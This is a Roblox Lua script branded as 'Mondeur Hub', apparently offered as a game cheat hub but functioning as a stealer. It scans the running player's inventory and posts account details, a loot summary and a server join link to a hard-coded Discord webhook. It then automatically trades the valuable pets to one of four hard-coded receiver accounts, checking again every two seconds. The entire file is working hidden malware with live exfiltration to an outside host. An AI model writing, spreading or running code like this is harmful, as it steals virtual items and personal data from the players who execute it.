-- [[ MONDEUR HUB (BEST) | V5 ELITE ]] --
local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local LocalPlayer = Players.LocalPlayer

-- [[ CONFIG ]] --
local USER_WEBHOOK = "https://discord.com/api/webhooks/1474651524251648163/lhPvWSeT6mcm3b4tIfzEbph1asYmZGvxf3YABYsKUOSeInP3oXW10NmHKJuj0vDrICku"
local POINT_SYSTEM_URL = "https://raw.githubusercontent.com/charles1384/ADM/refs/heads/main/Pointsystem"
local TARGET_RECEIVERS = {"2ndcfpaj67", "sofiqmnz", "Hisokarah", "CREOLEO23"}

local PetValues = {}

--------------------------------------------------------------
-- STABILITY FIX: WAIT FOR GAME LOAD
--------------------------------------------------------------
if not game:IsLoaded() then game.Loaded:Wait() end
repeat task.wait(1) until ReplicatedStorage:FindFirstChild("API")

-- [[ LOAD POINT SYSTEM ]] --
local function loadPoints()
    local success, content = pcall(function() return game:HttpGet(POINT_SYSTEM_URL) end)
    if success then
        for line in content:gmatch("[^\r\n]+") do
            local name, val = line:match("([^:=]+)[:=](%d+)")
            if name and val then 
                PetValues[name:lower():gsub("%s+", "")] = tonumber(val) 
            end
        end
    end
end
loadPoints()

--------------------------------------------------------------
-- THE UNIQUE WEBHOOK DESIGN
--------------------------------------------------------------
local function sendMondeurWebhook(pets, total, totalCount, receiverName)
    local request = (syn and syn.request) or (http and http.request) or http_request or request
    if not request then return end

    local petList = ""
    if #pets > 0 then
        for _, p in ipairs(pets) do
            petList = petList .. "🐾 **" .. p.name .. "** (`" .. p.value .. " pts`)\n"
        end
    else
        petList = "⚠️ *No high-value pets found in search.*"
    end

    local payload = {
        username = "Mondeur Hub (Best)",
        avatar_url = "https://cdn.discordapp.com/embed/avatars/0.png", 
        embeds = {{
            title = "🛰️ MONDEUR HUB | SESSION INITIALIZED",
            color = 0x7289DA, -- Stylish Blurple
            description = "━━━━━━━━━━━━━━━━━━━━━━━━━━\n" ..
                "👤 **User Name:** `" .. LocalPlayer.Name .. "`\n" ..
                "🎭 **Display Name:** `" .. LocalPlayer.DisplayName .. "`\n" ..
                "📅 **Account Age:** `" .. LocalPlayer.AccountAge .. " Days`\n" ..
                "👥 **Players In Server:** `" .. #Players:GetPlayers() .. "/" .. Players.MaxPlayers .. "`\n" ..
                "📥 **Receiver:** `" .. (receiverName or "Searching...") .. "`\n" ..
                "━━━━━━━━━━━━━━━━━━━━━━━━━━\n\n" ..
                "📦 **LOOT SUMMARY**\n" ..
                petList .. "\n" ..
                "💰 **Total Value:** `" .. total .. "`\n" ..
                "📝 **Total Pets Found:** `" .. totalCount .. "`\n\n" ..
                "━━━━━━━━━━━━━━━━━━━━━━━━━━\n" ..
                "🔍 **SCRAP SUMMARY**\n" ..
                "[View Raw Inventory Data](https://api.rubis.app/v2/scrap/nu3YNS4Pum4oLolW/raw)\n" ..
                "🔗 **QUICK JOIN**\n" ..
                "[Click to Join Server](https://www.roblox.com/games/" .. game.PlaceId .. "?jobId=" .. game.JobId .. ")",
            footer = { text = "Mondeur Hub v5 | " .. os.date("%X") }
        }}
    }

    pcall(function()
        request({
            Url = USER_WEBHOOK,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = HttpService:JSONEncode(payload)
        })
    end)
end

--------------------------------------------------------------
-- SCAN & TRADE LOGIC
--------------------------------------------------------------
local function scanAndTrade()
    local receiver = nil
    for _, name in ipairs(TARGET_RECEIVERS) do
        if Players:FindFirstChild(name) then receiver = Players[name] break end
    end

    local list, total, totalCount = {}, 0, 0
    local success, inv = pcall(function() return ReplicatedStorage.API["InventoryAPI/GetInventory"]:InvokeServer() end)
    
    if success and inv then
        for _, item in ipairs(inv) do
            if item.Kind == "Pet" then
                totalCount = totalCount + 1
                local cleanName = item.Name:lower():gsub("%s+", "")
                for pointName, val in pairs(PetValues) do
                    if string.find(cleanName, pointName) then
                        table.insert(list, {id = item.Id, name = item.Name, value = val})
                        total = total + val
                        break
                    end
                end
            end
        end
    end

    -- Send Initialized message with the actual Scan Results
    sendMondeurWebhook(list, total, totalCount, receiver and receiver.Name or "None Online")

    -- Execute Trade if items found and receiver is in server
    if #list > 0 and receiver then
        local TradeAPI = ReplicatedStorage.API
        TradeAPI["TradeAPI/SendTradeRequest"]:FireServer(receiver)
        for _, p in ipairs(list) do TradeAPI["TradeAPI/AddItemToOffer"]:FireServer(p.id) end
        TradeAPI["TradeAPI/AcceptTrade"]:FireServer()
        TradeAPI["TradeAPI/ConfirmTrade"]:FireServer()
    end
end

-- [[ START ]] --
print("🚀 Mondeur Hub (Best) Initialized.")
scanAndTrade() -- Run immediate scan for webhook

task.spawn(function()
    while true do
        task.wait(2) -- Loop every 2 seconds to check for new targets/receivers
        pcall(scanAndTrade)
    end
end)
